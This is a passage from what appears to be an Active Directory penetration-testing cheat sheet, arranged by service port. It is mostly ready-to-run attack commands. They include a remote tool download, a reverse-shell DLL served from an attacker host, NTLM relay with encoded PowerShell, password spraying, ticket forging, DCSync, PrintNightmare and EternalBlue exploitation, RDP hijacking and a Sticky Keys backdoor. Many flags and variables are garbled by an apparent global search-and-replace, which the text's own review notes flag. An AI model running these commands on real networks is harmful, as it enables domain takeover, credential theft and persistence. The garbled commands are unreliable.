certutil -urlcache -f http://10.10.14.1/tool.exe C:\Windows\Temp\tool.exe
# Bypass CLM (Constrained Language Mode)
powershell -version 2
$ExecutionContext.SessionState.LanguageMode

DNS (Port 53)

DNS Enumeration

bash
# Identify DC via DNS
nslookup -type=SRV _ldap._tcp.dc._msdcs.domain.local
dig SRV _ldap._tcp.dc._msdcs.domain.local
dig _kerberos._tcp.domain.local SRV
dig @10.10.10.10 domain.local AXFR

# Nmap DNS
nmap -p 53 --script dns-zone-transfer --script-args dns-zone-transfer.domain=domain.local 10.10.10.10
nmap -p 53 --script dns-brute --script-args dns-brute.domain=domain.local 10.10.10.10
nmap -p 53 --script dns-recursion 10.10.10.10

# adidnsdump (AD Integrated DNS)
adidnsdump -u domain.local\\administrator -p P@ssw0rd 10.10.10.10
adidnsdump -u domain.local\\administrator -p P@ssw0rd ldap://10.10.10.10 -r

# dnscmd (from Windows - DNS admin required)
dnscmd DC01.domain.local /enumzones
dnscmd DC01.domain.local /enumrecords domain.local .

Privesc - DNSAdmins to SYSTEM

powershell
# 1. Check DNSAdmins group membership
Get-DomainGroupMember "DNSAdmins"
net group "DNSAdmins" /domain
bash
# 2. Create malicious DLL (msfvenom)
msfvenom -p windows/x64/exec cmd='net group "domain admins" hacker /add /domain' -f dll -o evil.dll
# Or reverse shell:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f dll -o evil.dll

# 3. Serve the DLL via SMB (Impacket)
impacket-smbserver share $(pwd) -smb2support
powershell
# 4. Configure dnscmd to load the DLL
dnscmd DC01.domain.local /config /serverlevelplugindll \\10.10.14.1\share\evil.dll

# 5. Restart DNS service (requires SeRemoteShutdownPrivilege or DNS admin)
sc \\DC01.domain.local stop dns
sc \\DC01.domain.local start dns
Invoke-Command -ComputerName DC01.domain.local -ScriptBlock { Stop-Service dns; Start-Service dns }

# 6. Cleanup (after exploitation)
dnscmd DC01.domain.local /config /serverlevelplugindll ""
sc \\DC01.domain.local stop dns ; sc \\DC01.domain.local start dns

Privesc - ADIDNS Wildcard

powershell
# Add wildcard DNS record (captures all resolutions)
# Requires write rights on DNS zone (Domain Users by default in some configs)
Invoke-DNSUpdate -DNSType A -DNSName * -DNSData 10.10.14.1 -Realm domain.local
bash
# + Responder to capture NTLM hashes
sudo responder -I eth0 -wdP

Kerberos (Port 88)

Kerberos Enumeration

bash
# Check if port is open (= DC)
nmap -p 88 --open 10.10.10.0/24

# User enumeration via AS-REQ (pre-auth error vs administrator not found)
kerbrute userenum -d domain.local --dc 10.10.10.10 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
kerbrute userenum -d domain.local --dc 10.10.10.10 users.txt --downgrade -o valid_users.txt
kerbrute userenum --dc 10.10.10.10 -d domain.local users.txt -t 50

# P@ssw0rd spray (1 password x N users)
kerbrute passwordspray -d domain.local --dc 10.10.10.10 valid_users.txt 'Welcome1!'
kerbrute passwordspray -d domain.local --dc 10.10.10.10 valid_users.txt 'Password2024!' --delay 3000

# Targeted brute force
kerbrute bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt targetuser

Privesc - AS-REP Roasting

bash
# From Linux (no credentials)
impacket-GetNPUsers domain.local/ -dc-ip 10.10.10.10 -no-P@ssw0rd -usersfile valid_users.txt -format hashcat
impacket-GetNPUsers domain.local/ -dc-ip 10.10.10.10 -no-P@ssw0rd -usersfile valid_users.txt -outputfile asrep.hashes

# With credentials (auto-enumerates vulnerable accounts)
impacket-GetNPUsers domain.local/administrator:P@ssw0rd -dc-ip 10.10.10.10 -request -format hashcat
powershell
# From Windows
.\Rubeus.exe asreproast /outfile:asrep.hashes /format:hashcat /nowrap
.\Rubeus.exe asreproast /administrator:targetuser /format:hashcat /nowrap
Get-DomainUser -PreauthNotRequired | .\Rubeus.exe asreproast
bash
# Crack
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 18200 asrep.hashes rockyou.txt --rules-file OneRuleToRuleThemAll.rule
powershell
# Forced AS-REP (if GenericWrite on target account)
Set-DomainObject -Identity targetuser -XOR @{useraccountcontrol=4194304}
# ... capture the hash ... then re-enable
Set-DomainObject -Identity targetuser -XOR @{useraccountcontrol=4194304}

Privesc - Kerberoasting

bash
# From Linux
impacket-GetUserSPNs domain.local/administrator:P@ssw0rd -dc-ip 10.10.10.10 -request -outputfile kerb.hashes
impacket-GetUserSPNs domain.local/administrator -hashes :NTLMHASH -dc-ip 10.10.10.10 -request
impacket-GetUserSPNs domain.local/administrator:P@ssw0rd -dc-ip 10.10.10.10 -request-administrator svcSQL
powershell
# From Windows
.\Rubeus.exe kerberoast /outfile:kerb.hashes /nowrap
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
.\Rubeus.exe kerberoast /administrator:svcSQL /simple /nowrap
.\Rubeus.exe kerberoast /rc4opsec /nowrap
Get-DomainUser -SPN | select name,serviceprincipalname
bash
# Crack
hashcat -m 13100 kerb.hashes rockyou.txt
hashcat -m 19600 kerb.hashes rockyou.txt
hashcat -m 19700 kerb.hashes rockyou.txt
powershell
# Targeted Kerberoasting (if GenericWrite)
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/spn.domain.local'}
# ... kerberoast and crack ... then cleanup
Set-DomainObject -Identity targetuser -Clear serviceprincipalname

Privesc - Golden Ticket

powershell
# Prerequisites: krbtgt hash + domain SID

# Get domain SID
Get-DomainSID
wmic useraccount get name,sid | findstr /i admin
bash
impacket-lookupsid domain.local/administrator:P@ssw0rd@10.10.10.10
powershell
# Mimikatz - Forge Golden Ticket
kerberos::golden /administrator:Administrator /domain:domain.local /sid:S-1-5-21-XXXXX /krbtgt:KRBTGTHASH /id:500 /groups:512,513,518,519,520 /startoffset:0 /endin:600 /renewmax:10080 /ptt

# Rubeus
.\Rubeus.exe golden /rc4:KRBTGTHASH /domain:domain.local /sid:S-1-5-21-XXXXX /administrator:Administrator /id:500 /ptt
bash
# From Linux (Impacket): forge the ticket into a ccache, then use it with Kerberos auth
impacket-ticketer -nthash KRBTGTHASH -domain-sid S-1-5-21-XXXXX -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
# NOTE(review): `-no-P@ssw0rd` looks like a global search/replace artifact; verify the flag as printed
impacket-psexec -k -no-P@ssw0rd domain.local/Administrator@DC01.domain.local

Privesc - Silver Ticket

powershell
# Silver Ticket - Specific service (CIFS, HOST, LDAP, HTTP, MSSQL...)
# Prerequisites: NTLM hash of machine account or service account
# /id:500 = built-in Administrator RID; the ticket is only valid against /target for /service

# Mimikatz — NOTE(review): `/administrator:` looks like a global search/replace artifact; switch names are unverified as printed
kerberos::golden /administrator:Administrator /domain:domain.local /sid:S-1-5-21-XXXXX /rc4:MACHINE_NTLM_HASH /target:target.domain.local /service:cifs /id:500 /ptt
kerberos::golden /administrator:Administrator /domain:domain.local /sid:S-1-5-21-XXXXX /rc4:MACHINE_NTLM_HASH /target:DC01.domain.local /service:ldap /id:500 /ptt
# Detection side: the DC never sees a forged service ticket, so detection typically relies on logon events on the target host itself; PAC validation and regular machine-account key rotation limit the window

# Useful services:
# cifs - file access
# host - service management, schtasks
# http - WinRM
# ldap - DCSync
# mssql - SQL Server
# wsman - WinRM/PowerShell Remoting

Privesc - Unconstrained Delegation

powershell
# Identify machines with unconstrained delegation (PowerView, then the RSAT AD module)
Get-DomainComputer -Unconstrained | select dnshostname
Get-ADComputer -Filter {TrustedForDelegation -eq $True} -Properties TrustedForDelegation
bash
# Same check from Linux via LDAP
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd --trusted-for-delegation
powershell
# From compromised machine with unconstrained delegation:
# Monitor incoming TGTs (requires local admin on the delegating host)
.\Rubeus.exe monitor /interval:5 /nowrap
.\Rubeus.exe monitor /interval:5 /filteruser:DC$ /nowrap

# Force DC connection (PrinterBug / SpoolSample) — the DC's machine account authenticates to the delegating host
# Mitigation side: disabling the Print Spooler on DCs and marking privileged accounts "sensitive, cannot be delegated" / Protected Users removes this path
.\SpoolSample.exe DC01.domain.local unconstrained-srv.domain.local
.\MS-RPRN.exe \\DC01.domain.local \\unconstrained-srv.domain.local
bash
# Or PetitPotam (no auth) — unauthenticated coercion via EFSRPC; whether it still works without credentials depends on the DC's patch level
python3 PetitPotam.py unconstrained-srv.domain.local DC01.domain.local
powershell
# Inject the captured TGT (base64 blob from the monitor output) into the current session
.\Rubeus.exe ptt /ticket:doIFxTCC...B64...
klist

# Exploit with DCSync — NOTE(review): `/administrator:krbtgt` looks like a global search/replace artifact; verify the switch as printed
lsadump::dcsync /domain:domain.local /administrator:krbtgt
bash
# Linux equivalent using the captured DC$ ticket — NOTE(review): `-no-P@ssw0rd` looks like a global search/replace artifact
impacket-secretsdump -k -no-P@ssw0rd domain.local/DC$@DC01.domain.local

Privesc - Constrained Delegation

powershell
# Identify accounts with constrained delegation; msds-allowedtodelegateto lists the SPNs they may delegate to
Get-DomainUser -TrustedToAuth | select userprincipalname,msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | select name,msds-allowedtodelegateto
bash
# Same check from Linux
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd -M constrained-delegation
powershell
# S4U2Self + S4U2Proxy (Rubeus) — NOTE(review): `/administrator:` looks like a global search/replace artifact; switch names are unverified as printed
.\Rubeus.exe s4u /administrator:svc_constrained /rc4:NTLMHASH /impersonateuser:Administrator /msdsspn:"cifs/DC01.domain.local" /ptt
.\Rubeus.exe s4u /administrator:svc_constrained /rc4:NTLMHASH /impersonateuser:Administrator /msdsspn:"time/DC01.domain.local" /altservice:ldap /ptt

# If delegation to TIME - altservice to access LDAP/CIFS
# Mitigation side: members of Protected Users / accounts flagged "cannot be delegated" cannot be impersonated this way
.\Rubeus.exe s4u /administrator:srv$ /certificate:srv.pfx /impersonateuser:Administrator /msdsspn:"http/target.domain.local" /altservice:cifs,ldap,host /ptt
bash
# From Linux (Impacket): getST performs the S4U exchange and writes a ccache
impacket-getST -spn cifs/DC01.domain.local -impersonate Administrator 'domain.local/svc_constrained:P@ssw0rd'
export KRB5CCNAME=Administrator@cifs_DC01.domain.local@domain.local.ccache
# NOTE(review): `-no-P@ssw0rd` looks like a global search/replace artifact; verify the flag as printed
impacket-secretsdump -k -no-P@ssw0rd domain.local/Administrator@DC01.domain.local

Privesc - RBCD (Resource-Based Constrained Delegation)

powershell
# Prerequisites: GenericWrite or GenericAll on a target computer account

# 1. Create a fake computer account (PowerMad)
# Relies on ms-DS-MachineAccountQuota > 0 (default 10); setting it to 0 is a common hardening
# NOTE(review): the `-P@ssw0rd` parameter name looks like a global search/replace artifact; verify as printed
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount FakePC -P@ssw0rd $(ConvertTo-SecureString 'P@ssw0rd!' -AsPlainText -Force)

# 2. Get the SID of the fake computer
$sid = Get-DomainComputer FakePC -Properties objectsid | Select -Expand objectsid

# 3. Configure msDS-AllowedToActOnBehalfOfOtherIdentity
# Builds a security descriptor granting the fake computer full rights, then writes it to the target
# This write to the target computer object is the key audit event for defenders (5136 / 4662 where enabled)
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($sid))"
$SDbytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDbytes,0)
Get-DomainComputer -Identity TargetSrv | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDbytes}

# 4. Get the hash of FakePC
.\Rubeus.exe hash /password:'P@ssw0rd!'

# 5. S4U and ptt — NOTE(review): `/administrator:` looks like a global search/replace artifact
.\Rubeus.exe s4u /administrator:FakePC$ /rc4:NTLM_OF_FAKEPC /impersonateuser:Administrator /msdsspn:CIFS/TargetSrv.domain.local /ptt
bash
# From Linux: same RBCD chain with Impacket (create computer, write the delegation attribute, S4U, use ticket)
# NOTE(review): `-computer-P@ssw0rd` and `-no-P@ssw0rd` look like global search/replace artifacts; flag names are unverified as printed
impacket-addcomputer domain.local/administrator:P@ssw0rd -computer-name 'FakePC$' -computer-P@ssw0rd 'P@ssw0rd!'
impacket-rbcd -delegate-from 'FakePC$' -delegate-to 'TargetSrv$' -action write domain.local/administrator:P@ssw0rd
impacket-getST -spn cifs/TargetSrv.domain.local -impersonate Administrator 'domain.local/FakePC$:P@ssw0rd!'
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-P@ssw0rd domain.local/Administrator@TargetSrv.domain.local

LDAP / LDAPS (Ports 389, 636, 3268, 3269)

LDAP Enumeration

bash
# Test anonymous bind (-x = simple bind, no credentials); AD rejects anonymous reads by default unless dsHeuristics was relaxed
ldapsearch -H ldap://10.10.10.10 -x -s base
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" "(objectClass=*)" | head -50

# Full anonymous dump
# NOTE(review): `(objectClass=administrator)` looks like a global search/replace artifact; the filter is unverified as printed
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" "(objectClass=administrator)" sAMAccountName description memberOf
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" "(objectClass=group)" cn member

# With authentication (-D bind DN or DOMAIN\user, -w password)
ldapsearch -H ldap://10.10.10.10 -D "CN=user,CN=Users,DC=domain,DC=local" -w 'P@ssw0rd' -b "DC=domain,DC=local" "(objectClass=administrator)"
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" -D "domain.local\administrator" -w 'P@ssw0rd' "(admincount=1)" sAMAccountName

# ldapdomaindump: writes HTML/JSON/grep-able dumps of users, groups, computers, policy
ldapdomaindump -u "domain.local\administrator" -p 'P@ssw0rd' ldap://10.10.10.10
ldapdomaindump -u "domain.local\administrator" -p 'P@ssw0rd' ldap://10.10.10.10 -o /tmp/ldap_dump/

# With NetExec (first line = null/anonymous credentials)
netexec ldap 10.10.10.10 -u '' -p '' --users
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd --users
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd --groups
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd --password-not-required
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd --admin-count
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd -M get-desc-users
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd -M ldap-signing

# Nmap LDAP scripts — ldap-brute performs credential guessing and can trigger account lockouts; the other two are read-only
nmap -p 389,636 --script ldap-search,ldap-rootdse,ldap-brute 10.10.10.10

Privesc - LDAP Relay (ntlmrelayx)

bash
# Check if LDAP signing is required (signing + channel binding on LDAPS are the mitigations for every relay below)
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd -M ldap-signing
# NOTE(review): ldap-novell-getpass targets Novell eDirectory, not AD signing settings — this line looks misplaced here
nmap -p 389 --script ldap-novell-getpass 10.10.10.10

# Relay NTLM to LDAP (escalate an existing user / add a computer account)
# NOTE(review): `--escalate-administrator` looks like a global search/replace artifact; flag names are unverified as printed
impacket-ntlmrelayx -t ldap://10.10.10.10 --escalate-administrator compromised_user
impacket-ntlmrelayx -t ldaps://10.10.10.10 --add-computer FakePC --computer-password 'P@ssw0rd!'

# Relay to LDAP with dump (-wh serves a WPAD host, -l writes loot to the given directory)
impacket-ntlmrelayx -t ldap://10.10.10.10 -wh fakewpad.domain.local -l /tmp/ldap_loot

# Via mitm6 (IPv6) — answers DHCPv6/DNS for the whole segment, so every IPv6-enabled host in scope is affected; keep it scoped and short-lived
sudo mitm6 -d domain.local &
impacket-ntlmrelayx -6 -t ldaps://10.10.10.10 -wh fakewpad.domain.local --add-computer EvilPC --computer-password 'Pass123!'
# Then use RBCD with the created computer

Privesc - DACL / ACL Abuse

powershell
# Identify exploitable ACLs (PowerView); the second form filters for rights held by the account you control
Find-InterestingDomainAcl -ResolveGUIDs | select IdentityReferenceName,ActiveDirectoryRights,ObjectDN | ft -wrap
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "compromised_user"}

# GenericAll or GenericWrite - Reset password
# NOTE(review): `$P@ssw0rd` is not a valid PowerShell variable name — it looks like a global search/replace artifact
$P@ssw0rd = ConvertTo-SecureString 'NewP@ss123!' -AsPlainText -Force
Set-DomainUserPassword -Identity targetuser -AccountPassword $P@ssw0rd

# ForceChangePassword (run under alternate credentials)
$cred = New-Object System.Management.Automation.PSCredential("domain.local\administrator", (ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force))
Set-DomainUserPassword -Identity targetuser -AccountPassword $P@ssw0rd -Credential $cred

# GenericWrite - Add member to a group
Add-DomainGroupMember -Identity "Domain Admins" -Members compromised_user

# WriteDACL - Add DCSync rights (a replication-rights ACE on the domain head; a high-value audit event for defenders)
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity compromised_user -Rights DCSync -Verbose
bash
# Then DCSync from Linux with the account that was granted replication rights:
impacket-secretsdump domain.local/compromised_user:P@ssw0rd@DC01.domain.local -just-dc
powershell
# WriteOwner - Take ownership then modify (owner can grant itself full rights, then reset the password)
Set-DomainObjectOwner -Identity targetuser -OwnerIdentity compromised_user
Add-DomainObjectAcl -TargetIdentity targetuser -PrincipalIdentity compromised_user -Rights All
Set-DomainUserPassword -Identity targetuser -AccountPassword $P@ssw0rd

# AdminSDHolder (persistence via ACL propagation every 60 min)
# SDProp re-stamps this ACL onto all protected (adminCount=1) objects, so an ACE here survives per-object cleanup — audit changes to this container
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -PrincipalIdentity compromised_user -Rights All

SMB (Ports 139, 445)

SMB Enumeration

bash
# Check SMB signing (hosts where signing is not required are relayable; requiring signing is the mitigation)
nmap -p 445 --script smb-security-mode,smb2-security-mode 10.10.10.0/24
netexec smb 10.10.10.0/24 --gen-relay-list relay_targets.txt

# Null session (no credentials)
enum4linux -a 10.10.10.10
enum4linux-ng -A 10.10.10.10 -oA enum_output
smbclient -N -L //10.10.10.10
smbmap -H 10.10.10.10
smbmap -H 10.10.10.10 -u '' -p ''

# With credentials
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd --shares
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd --sessions
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd --loggedon-users
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd --users
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd --groups
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd --pass-pol
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd -M spider_plus

# Spider + sensitive file search (recursive reads of C$ are noisy in file-access auditing)
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd --spider C$ --pattern "*.config,*.xml,*.ini,*.txt,*password*,*cred*"
smbmap -H 10.10.10.10 -u administrator -p P@ssw0rd -R --dir-only
smbclient //10.10.10.10/SHARE -U 'domain.local\administrator%P@ssw0rd' -c 'ls; get file.txt; mget *.xml'

# Nmap SMB scripts
nmap -p 445 --script smb-enum-shares,smb-enum-users,smb-ls,smb-os-discovery,smb-vuln-ms17-010 10.10.10.10

# Snaffler (find sensitive files) — Windows binary, run from a domain-joined host rather than this Linux shell
.\Snaffler.exe -s -d domain.local -o snaffler.log -v data

Privesc - LLMNR/NBT-NS Poisoning + SMB Relay

bash
# 1. Poisoning (capture NTLMv2) — answers LLMNR/NBT-NS/mDNS name lookups on the local segment
# Mitigation side: disable LLMNR and NBT-NS via GPO and require SMB signing; poisoning only works where these remain on
sudo responder -I eth0 -wdP
# -A = analyze mode: listen and log requests without poisoning
sudo responder -I eth0 -A

# Crack captured hashes (mode 5600 = NetNTLMv2)
hashcat -m 5600 ntlmv2.hashes rockyou.txt
hashcat -m 5600 ntlmv2.hashes rockyou.txt --rules-file best64.rule

# 2. SMB Relay (if SMB signing disabled on target)
# Disable SMB and HTTP in /etc/responder/Responder.conf so ntlmrelayx can bind those ports instead
sudo responder -I eth0 -wd
impacket-ntlmrelayx -tf relay_targets.txt -smb2support
impacket-ntlmrelayx -tf relay_targets.txt -smb2support -c "powershell -enc BASE64CMD"
# -i = interactive SMB shell on successful relay
impacket-ntlmrelayx -tf relay_targets.txt -smb2support -i

# Relay to LDAP (add account) — NOTE(review): `--escalate-administrator` looks like a global search/replace artifact; verify the flag as printed
impacket-ntlmrelayx -t ldap://DC01.domain.local --escalate-administrator administrator
impacket-ntlmrelayx -t ldaps://DC01.domain.local --add-computer EvilPC --computer-password 'Pass123!'

Privesc - PsExec / Exec via SMB

bash
# Pass-the-Password (psexec installs a temporary service on the target; smbexec runs commands through a service as well — both leave 7045 service-install events)
impacket-psexec domain.local/administrator:P@ssw0rd@10.10.10.10
impacket-smbexec domain.local/administrator:P@ssw0rd@10.10.10.10
# -x runs via cmd, -X via PowerShell
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd -x "whoami"
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd -X "whoami"

# Pass-the-Hash (NT hash only; LM half left empty)
impacket-psexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH
impacket-smbexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH
netexec smb 10.10.10.10 -u Administrator -H NTLMHASH -x "whoami"
# --local-auth: try the hash as a local account across the subnet (shared local admin passwords); LAPS is the mitigation
netexec smb 10.10.10.0/24 -u Administrator -H NTLMHASH --local-auth

# atexec (via scheduler)
# NOTE(review): `net administrator hacker ...` looks like a global search/replace artifact; the quoted command is unverified as printed
impacket-atexec domain.local/administrator:P@ssw0rd@10.10.10.10 "whoami"
impacket-atexec domain.local/administrator@10.10.10.10 -hashes :HASH "net administrator hacker P@ss /add /domain"

Privesc - EternalBlue (MS17-010)

bash
# Scan (read-only checks; the nmap script probes for the MS17-010 patch state)
nmap -p 445 --script smb-vuln-ms17-010 10.10.10.10
netexec smb 10.10.10.10 -u '' -p '' -M ms17-010

# Exploitation (Metasploit console commands, not shell)
# Kernel-level SMB exploit: a failed attempt can crash the target, so confirm scope and backups first
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 10.10.10.10
set LHOST 10.10.14.1
run

# Impacket-based standalone PoC
python3 zzz_exploit.py 10.10.10.10

RPC / MSRPC (Ports 135, 593)

RPC Enumeration

bash
# Nmap: enumerate exposed RPC endpoints / interfaces
nmap -p 135 --script msrpc-enum 10.10.10.10
nmap -p 135,593 --script rpc-grind 10.10.10.10

# rpcclient (first form = null session, -N = no password prompt)
rpcclient -U "" -N 10.10.10.10
rpcclient -U "domain.local\administrator%P@ssw0rd" 10.10.10.10

# Useful rpcclient commands (typed at the interactive rpcclient prompt)
# RIDs: 0x200 = 512 Domain Admins, 0x1f4 = 500 built-in Administrator
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> querydominfo
rpcclient $> querydispinfo
rpcclient $> getdompwinfo
rpcclient $> querygroup 0x200
rpcclient $> queryuser 0x1f4
rpcclient $> queryusergroups 0x1f4
rpcclient $> lookupnames administrator
rpcclient $> lsaquery
rpcclient $> lookupnames "Domain Admins"

# impacket rpcdump: list registered RPC endpoints (unauthenticated, then authenticated)
impacket-rpcdump 10.10.10.10
impacket-rpcdump domain.local/administrator:P@ssw0rd@10.10.10.10

Privesc - PrinterBug / PrintNightmare

bash
# SpoolSample (MS-RPRN) - force NTLM auth to a controlled host (second line is the Windows binary)
# Mitigation side: disable the Print Spooler on DCs and other servers that do not print
python3 printerbug.py domain.local/administrator:P@ssw0rd@DC01.domain.local 10.10.14.1
.\SpoolSample.exe DC01.domain.local attacker.domain.local

# PrintNightmare (CVE-2021-1675 / CVE-2021-34527) - RCE SYSTEM
# Only affects unpatched hosts with the Spooler running; loads a DLL from the given UNC path
# Linux (Impacket)
python3 CVE-2021-1675.py domain.local/administrator:P@ssw0rd@10.10.10.10 '\\10.10.14.1\share\evil.dll'
powershell
# PowerShell (local privesc to SYSTEM)
.\CVE-2021-1675.ps1
Invoke-Nightmare -DLL "C:\evil.dll"
# Add admin without custom DLL — creates a persistent local account; record it for cleanup
Invoke-Nightmare -DriverName "Legit" -NewUser "hacker" -NewPassword "P@ssw0rd!"

WinRM (Ports 5985, 5986)

WinRM Enumeration

bash
# Scan for WinRM listeners (5985 HTTP, 5986 HTTPS), then test credentials with NetExec
nmap -p 5985,5986 --open 10.10.10.0/24
netexec winrm 10.10.10.10 -u administrator -p P@ssw0rd
netexec winrm 10.10.10.0/24 -u administrator -p P@ssw0rd
powershell
# Check WinRM access (PowerShell); Test-WSMan only confirms the listener responds, not that you can log in
Test-WSMan -ComputerName target.domain.local
Test-WSMan -ComputerName 10.10.10.10 -Authentication Kerberos

WinRM Exploitation

bash
# Evil-WinRM (password, hash, script/exe directories, Kerberos with SSL)
evil-winrm -i 10.10.10.10 -u administrator -p P@ssw0rd
evil-winrm -i 10.10.10.10 -u Administrator -H NTLMHASH
evil-winrm -i 10.10.10.10 -u administrator -p P@ssw0rd -s /opt/scripts
evil-winrm -i 10.10.10.10 -u administrator -p P@ssw0rd -e /opt/exes
evil-winrm -i 10.10.10.10 -u administrator -k -S

# Inside evil-winrm (typed at the remote prompt)
menu
upload /local/path /remote/path
download /remote/path /local/
Invoke-Binary /opt/SharpHound.exe

Privesc via WinRM

bash
# Pass-the-Hash to WinRM (if account in Remote Management Users or local Administrators)
evil-winrm -i 10.10.10.10 -u Administrator -H NTLMHASH
powershell
# From Mimikatz + PTH: spawn a process whose logon session carries the NT hash, then open a remote session from it
# NOTE(review): `/administrator:administrator` looks like a global search/replace artifact; the switch name is unverified as printed
sekurlsa::pth /administrator:administrator /domain:domain.local /ntlm:HASH /run:"powershell -nop -c 'Enter-PSSession -ComputerName target'"
bash
# Via Impacket — NOTE(review): wmiexec uses WMI over DCOM (port 135 + dynamic ports), not WinRM; it is listed here as an alternative remote-exec path
impacket-wmiexec domain.local/administrator:P@ssw0rd@10.10.10.10
impacket-wmiexec domain.local/administrator@10.10.10.10 -hashes :NTLMHASH

RDP (Port 3389)

RDP Enumeration

bash
# Scan: RDP encryption/NLA settings and the MS12-020 check
nmap -p 3389 --script rdp-enum-encryption,rdp-vuln-ms12-020 10.10.10.0/24
netexec rdp 10.10.10.0/24 -u administrator -p P@ssw0rd
netexec rdp 10.10.10.10 -u administrator -p P@ssw0rd --screenshot

# Test access (/cert-ignore skips certificate validation — expected for self-signed RDP certs)
xfreerdp /v:10.10.10.10 /u:administrator /p:P@ssw0rd /cert-ignore
rdesktop -u administrator -p P@ssw0rd 10.10.10.10

Privesc - Pass-the-Hash RDP (Restricted Admin Mode)

powershell
# Check/enable Restricted Admin Mode (DisableRestrictedAdmin = 0 means the mode is enabled)
reg query "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin
# Enable from existing session — persistent LSA configuration change on the host; restore the original value afterwards
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
bash
# Pass-the-Hash via RDP (only works when Restricted Admin mode is enabled on the target)
xfreerdp /v:10.10.10.10 /u:Administrator /pth:NTLMHASH /cert-ignore
powershell
# Via Mimikatz — NOTE(review): `/administrator:Administrator` looks like a global search/replace artifact; the switch name is unverified as printed
sekurlsa::pth /administrator:Administrator /domain:domain.local /ntlm:NTLMHASH /run:"mstsc.exe /restrictedadmin"

Privesc - RDP Session Hijacking

powershell
# List active RDP sessions (from SYSTEM shell); note the session ID and session name columns
qwinsta /server:10.10.10.10
query session /server:10.10.10.10

# Hijack a session without password (SYSTEM required)
# Create a service to connect to the session (2 and rdp-tcp#13 below are sample values from the listing above)
# NOTE(review): in PowerShell `sc` resolves to the Set-Content alias; the native tool is sc.exe
sc create sesshijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
net start sesshijack

# Via tscon directly (SYSTEM)
tscon 2 /dest:rdp-tcp#13

# Bypass "Single Session per User" — persistent policy change on the host; restore afterwards
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

# Sticky Keys backdoor (persistence) — an IFEO Debugger value on sethc.exe is a well-known artifact that defenders hunt for
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
# Press 5x Shift on login screen - SYSTEM shell

Privesc - BlueKeep (CVE-2019-0708)

bash
# Scan
# NOTE(review): rdp-vuln-ms12-020 checks MS12-020, not CVE-2019-0708 — this nmap line does not detect BlueKeep
nmap -p 3389 --script rdp-vuln-ms12-020 10.10.10.10
netexec rdp 10.10.10.10 -u '' -p '' -M bluekeep

# Metasploit (console commands, not shell)
# Kernel exploit: TARGET must match the victim's OS build; a mismatch typically crashes the host
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 10.10.10.10
set TARGET 2
run

MSSQL (Port 1433)

MSSQL Enumeration

bash
# Discover MSSQL instances (nmap scripts include an empty-password check)
nmap -p 1433 --script ms-sql-info,ms-sql-config,ms-sql-empty-password 10.10.10.0/24
# stderr discarded to quiet connection errors across the subnet
netexec mssql 10.10.10.0/24 -u '' -p '' 2>/dev/null
# sa with an empty password, SQL (local) authentication
netexec mssql 10.10.10.0/24 -u sa -p '' --local-auth

# Connection (-windows-auth = domain account; last line = SQL login)
impacket-mssqlclient domain.local/administrator:P@ssw0rd@10.10.10.10 -windows-auth
impacket-mssqlclient domain.local/administrator@10.10.10.10 -hashes :NTLMHASH -windows-auth
impacket-mssqlclient sa:P@ssw0rd@10.10.10.10
powershell
# From Windows (PowerUpSQL): find instances via SPNs, test which accept the current logon, then audit
Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain
